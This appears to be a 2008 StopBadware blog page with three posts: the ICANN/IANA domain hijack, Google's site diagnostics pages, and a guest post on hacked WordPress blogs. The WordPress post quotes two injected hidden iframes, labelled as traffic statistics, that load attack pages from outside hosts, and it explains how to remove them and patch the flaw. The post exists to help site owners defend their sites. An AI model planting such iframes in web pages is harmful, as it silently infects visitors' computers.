No such thing as a guaranteed safe site

Posted on June 27, 2008 - 12:22 by egeorge

When I talk to friends about web-based badware, one of the most frequent things I hear is a version of "Oh, I don't have to worry about that - I don't go to any sketchy sites." The security world has known for a while now that even legitimate, trusted websites can be hacked, but that knowledge still hasn't made its way out to much of the public. It often takes the hacking of a prominent site to shatter the illusion.

This week, the website of ICANN, the Internet Corporation for Assigned Names and Numbers, was hacked and defaced, along with the site for IANA, the Internet Assigned Numbers Authority. ICANN is the group in charge of internet governance at its most basic level, choosing which new top-level domains (like .com or .org) to create, and setting the protocols for how internet addresses work. Ironically, it was the domain name settings for the ICANN and IANA sites themselves that were hacked and redirected to a page with a derisive message.

The hackers fortunately are a group from Turkey apparently more interested in mischief and notoriety than in harming user's computers, but it would have been easy to redirect ICANN and IANA visitors to a malicious site if that had been the hackers' goal.

The lesson? As ZDNet's "Dancho Danchev put it":http://blogs.zdnet.com/security/?p=1356&tag=nl.e539:

bq. One thing’s for sure though, if the ICANN and IANA can lose control of their domains, anyone can.

Google's new resource for owners of compromised sites

Posted on May 21, 2008 - 15:07 by egeorge

Google has rolled out a new resource for owners of compromised websites that it flags as potentially dangerous in its search results.

"Google Diagnostics":http://googleonlinesecurity.blogspot.com/2008/05/safe-browsing-diagnosti... shows information about malware and malware-distributing behaviors that Google has observed on the site within the past 90 days.

We're already hearing from website owners and the volunteers in our "discussion group":http://groups.google.com/group/stopbadware that the new diagnostics pages are helpful in discovering problems with a site. We'd like to applaud Google for taking this step in greater transparency. This new resource should help website owners in cleaning and securing their sites faster, which will help protect even more internet users.

You can see an example diagnostics page "here":http://www.google.com/safebrowsing/diagnostic?site=http://malware.testin....

StopBadware discussion group sees flurry of hacked WordPress blogs

Posted on February 18, 2008 - 16:23 by egeorge

We like to feature occasional guest posts from members of the StopBadware community. Below, guest poster and StopBadware discussion group volunteer Steven Whitney sheds some light on a recent flurry of attacks on WordPress sites:

The StopBadware discussion group
began receiving in January a flurry of reports about WordPress
blogs suddenly flagged for badware by Google. The blogs had been hacked, and one or both
of the following iframes were injected into their posts:

<!-- Traffic Statistics -->
<iframe src="http://www.wp-stats-php. info/iframe/wp-stats.php" frameborder="0" height="1" width="1"></iframe>
<!-- End Traffic Statistics -->

<!-- Traffic Statistics -->
<iframe src="http://61.132.75. 71/iframe/wp-stats.php" frameborder="0" height="1" width="1"></iframe>
<!-- End Traffic Statistics -->

In spite of their innocent-looking labeling, these links weren't put on the
pages by the authors, and they're not for traffic statistics. The iframes,
hosted on sites in Beijing, China, attack a visitor's computer with the virus

In this
StopBadware thread
about the iframes
a post by member Ty H describes how to use WordPress Site Admin to repair
defaced blog posts.

In addition to repairing the pages, webmasters need to close the
vulnerability that allows the iframe injections to occur.

On Feb. 5,
WordPress issued version 2.3.3, an urgent security release
to patch a flaw
in xmlrpc.php that allowed a user to edit posts of other users. It's not stated
whether this release is a response to the iframe injections, but the discussion
group members who upgraded to WP 2.3.3 have so far not reported recurrences.

New versions of WordPress should always be installed promptly because the popular blogging software is heavily targeted by hackers
using automated crawlers. You can register at
to receive email notifications when new versions are
announced. Enter your email address in the box at the bottom of the page.

A list of known WordPress vulnerabilities can be found at

When users solve problems together in the StopBadware discussion group and
report their findings, it helps others who encounter the same problem later.